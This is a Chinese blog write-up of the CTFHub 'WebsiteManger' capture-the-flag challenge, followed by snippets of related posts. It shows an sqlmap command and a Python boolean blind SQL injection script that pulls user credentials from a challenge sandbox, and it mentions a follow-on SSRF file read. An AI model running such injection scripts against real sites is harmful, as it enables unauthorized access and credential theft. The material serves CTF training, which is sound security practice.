ctfhub-历年真题web-WebsiteManger

最新推荐文章于 2025-03-09 16:55:49 发布
原创 最新推荐文章于 2025-03-09 16:55:49 发布 · 2k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#信息安全 #网络

本文详细探讨了ctfhub竞赛中WebsiteManger挑战中的布尔盲注和跨站请求伪造技术。通过sqlmap工具发现注入漏洞,并利用payload实现登录并触发服务器端的文件读取,展示了安全测试中的实践技巧。
该文章已生成可运行项目,

ctfhub 历年真题 web

WebsiteManger

题目考点

  • 布尔盲注
  • SSRF

解题思路

进行登入点使用sqlmap 测试无果

仔细观察, 图片链接处存在注入点
在这里插入图片描述
使用sqlmap进行测试

sqlmap -u  "http://challenge-94b51247b7b2ac6f.sandbox.ctfhub.com:10800/image.php?id=3"  --tamper  space2mysqlblank  --technique=B  --level 5  --current-db

解释

  • tampe 参数会对payload进行处理绕过过滤
    参考链接: 传送门
  • technique 控制sqlmap使用的检测技术, 默认使用所有的检测技术

根据显示存在,布尔盲注

在这里插入图片描述
工具给出的payload , 写出脚本

import requests
import string

charset = ",@"+ string.digits + string.ascii_lowercase + string.ascii_uppercase

def r(s):
    s = s.replace(" ", "/**/")
    return s

sql = r("select concat(id,username,password) from users")
result = ""
for i in range(1,50):
    for c in charset:
        cc = ord(c)
        url = f"http://eci-2zeir5o8p6vh6eotta01.cloudeci1.ichunqiu.com/image.php?id=-1/*
*/or/**/(ascii(mid(({sql}),{i},1))={cc})"
        r = requests.get(url)
        if len(r.text) > 1024:
            result += c
            print(result)
            break
print('over!!!'

注意前面是用户名后面是密码
在这里插入图片描述

登入后就很明显了,读取文件, SSRF 上了。
在这里插入图片描述

登入

本文章已经生成可运行项目
CTFhub---WebsiteManger
jiet07的博客
11-09 2799
思路 进入题目:刷新,图片会更新 新建标签页打开,有id参数 使用sqlmap 进行测试
CTFHub_2021-第四届红帽杯网络安全大赛-Web-WebsiteManger
weixin_40872714的博客
03-26 1988
CTFHub_2021-第四届红帽杯网络安全大赛-Web-WebsiteManger(布尔盲注、SSRF ) 场景描述:最新的网站测试器,作为非站长的你,能利用好它的功能吗? 场景打开后,如下,是个登录框 查看源码,发现可能的注入点 /image.php?id=2 布尔盲注 /image.php?id=if(1=1,1,5) True /image.php?id=if(1=2,1,5) False 条件为真时?id=1,回显第一张图片,条件为假时?id=5,没有id=5的图片,什么都没有。即可
CTFHUB历年真题练习
qq_51558360的博客
10-11 1677
WebsiteManger 考点 布尔盲注、SSRF 尝试了一般登录方法没有反应。查看源码发现sql注入的利用点在图片上 盲注脚本 import string from requests import * allstr = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\]^_`{|}~' myurl = 'http://challenge-1993b
CTFHUB WEBSITE WEBMANAGER 通关
qq_43338937的博客
09-11 514
考点 ssrf 布尔盲注 测试登录页面 username参数位置可以进行布尔盲注 手工测试 a" or sleep(2)--+ 参数使用post提交 保存数据包 利用sqlmap工具进行注入获取数据库 表 用户密码 python3 sqlmap.py -r a.txt --data="username=a&password=a" -p username --curent-db python3 sqlmap.py -r a.txt --data="username=
CTFHUB 历年真题 afr-1
weixin_68416970的博客
12-20 359
p=hello,尝试?p=flag 发现都是 no。得到 base64 编码再解码发现了本题的 flag。尝试假设它是个PHP文件,利用php伪协议。
CTFHub-历年真题-RSA(2018-百越杯-Crypto-RSA)
qtL0ng的博客
04-15 1095
题目给了公钥文件pubkey.pem和密文flag.enc,还有下面的加密算法: #!/usr/bin/env python3 import gmpy2 from Crypto.Util.number import getPrime from Crypto.PublicKey import RSA from Crypto.Cipher import PKCS1_v1_5 from base64 import b64encode flag = open('flag', 'r').read().strip()
CtfHub-wp(web
01-23
本文主要探讨了CTF(Capture The Flag)竞赛中与Web安全相关的知识点,通过解决一系列问题,我们可以学习到如何发现和利用网站的漏洞获取关键信息。首先,提到了通过查找网站的备份文件来获取线索,例如在URL后添加...
CTFHUB-web-信息泄漏
2401_84254530的博客
07-20 1427
Git是一个开源的分布式版本控制系统,在执行git init初始化目录的时候,会在当前目录下自动创建一个.git 目录,用来记录代码的变更记录等。通过了解知道vim缓存文件的后缀名为 .swp 根据提示我们知道flag在index.php中,而一般情况下vim缓存文件都是隐藏的,我们要找的他的flag就可以直接在.index.php后面跟一个.swp。这就引起了git泄露漏洞。但是我们在这么输入过后,得到的是“未找到”,但是却得到了一份文件,我们下载好这份文件,并使用记事本打开,就可以得到flag。
ctfhub-web-ssrf通关攻略
最新发布
qq_64470109的博客
03-09 1223
题目提示我们访问本机的flag.php,那我们便去访问一下OK,出来结果。
CTFHUB-技能树-web-信息泄露
qq_51780583的博客
06-04 1306
CTFHUB-技能树-web-信息泄露
ctfhub web全部做题记录(持续跟新)
01-08
信息泄露 目录历遍 直接找就行。。。 PHPINFO 进去直接 ctrl+f 搜flag就行。。。 备份文件下载 网站源码 提示一些相关的名字 可以写个简单的脚本爆破一下 当然也可以 dirsearch 直接扫 import requests url = http://challenge-c93f188d4781b829.sandbox.ctfhub.com:10080/ a = ['web','website','backup','back','www','wwwroot','temp'] b = ['tar','tar.gz','zip','rar'] for i in a: fo
CTFHub_历年真题_2020_BJDCTF_Misc】
weixin_47038938的博客
08-16 457
CTFHub_历年真题_2020_BJDCTF_Misc
CTFHUB-WEB题目
Zxy_space的博客
10-13 524
CTFHub - 注入 1. 字符型注入 2. 报错注入 一、updatexml函数 UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称。 第二个参数:XPath_string (Xpath格式的字符串) 。 第三个参数:new_value,String格式,替换查找到的符合条件的数据 作用:改变文档中符合条件的节点的值。 由于updatexml的第二个参数需要Xpath格式的字
CTFHub Web真题(7星)
qq_43936524的博客
05-20 890
文章目录七星难度SQL注入-2(字符布尔盲注)namp(nmap命令注入)shrine(Jinja SSTI)Web1(sql注入过滤)easy_login(nodejs JWT攻击) 七星难度 SQL注入-2(字符布尔盲注) fuzz admin字段发现会有两种结果账号不存在,和账号和密码错误 测试payload分别为admin' and 1=1 and 'tt'='tt和admin' and 1=2 and 'tt'='tt 猜测为'字符截断的字符型布尔盲注。 sqlmap语句 python sqlma
2021红帽杯 WebsiteManger
LYJ20010728的博客
06-22 861
2021红帽杯 WebsiteManger考点思路Payload 考点 布尔盲注、SSRF 思路 尝试一般的登录方法没得用处,F12查看,登录框没有sql注入的利用点,发现还有一张图片,好家伙,sql注入的利用点在图片上 当id的值为0时没有图片回显,利用布尔盲注得到用户密码:14348d305648989c355433b9a04dffce,用户名为:admin,登录进去一个很明显的ssrf考点 猜测 flag在根目录下:file:///flag Payload 盲注脚本 impo
ctfhub技能书+历年真题学习笔记(详解)
热门推荐
qq_50589021的博客
03-30 8万+
Web Web前置技能 HTTP协议 请求方式 题目: HTTP Method is GET Use CTF**B Method, I will give you flag. Hint: If you got 「HTTP Method Not Allowed」 Error, you should request index.php. 意思就是你是get请求,你把这个请求换成CTFHUB就行 所以抓包直接一把梭 302跳转 题目: No Flag here! Give me Flag 点击发现没有跳转
CTFHub 信息泄露技能树
qq_43936524的博客
04-20 399
文章目录备份文件下载网站源码bak文件vim缓存.DS_Storegit泄露logslashIndexSVN泄露HG泄露 备份文件下载 网站源码 泄露文件夹为www.zip,解压后得到三个文件 访问Web目录下flag_256061047.txt路径得到flag bak文件 dirsearch扫描结果 vim缓存 当开发人员在线上环境中使用 vim 编辑器,在使用过程中会留下 vim 编辑器缓存,当vim异常退出时,缓存会一直留在服务器上,引起网站源码泄露。 第一次意外退出产生的交换文件名为 .i
CTFHub Web真题(3星-6星)
qq_43936524的博客
05-20 2369
三星难度Web题 afr-2 afr-1 提示文件包含 输入hello 回显hello world! 输入flag 回显no no no 又试了几个输入无回显 可以猜测输入的内容添加了后缀后显示出了文件内容 采用 php://filter/read=convert.base64-encode/resource=flag 成功读取flag.php内容 解码后得到flag n1book{afr_1_solved} checkin 扫目录只扫出了index.php一个页面,抓取响应包发现有flag字段
CTFHUB学习题解Web(1)- 前置技能(持续更新整理)
独沐晨霖
07-21 2389
注: 1. 因为是个入门题网站,若题目仅涉及简单的基础知识,就不截图了,仅简要说明过程 2. 题库尚不完全,没有内容的分支先直接跳过,等题库更新再做添加 3. 大标题为版块名,小标题为含有题目的上级菜单名,无序黑体为题目名 Web HTTP协议 请求方式 众所周知,HTTP的请求方法是可以自定义的,用burp抓个包改一下请求方式为题目要求的CTFHUB就可以了 302重定向 打开网页用F12发现请求会被302重定向回index.html,用burp拦截并send to repeater即可得到fla
CTFHUB----web前置技能-rce
01-01
### CTFHUB Web 前置技能 RCE 挑战及解题思路 #### 远程命令执行简介 远程命令执行(Remote Command Execution, RCE),是指攻击者能够通过应用程序接口发送特定指令,在服务器端执行任意操作系统级别的命令。这种...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值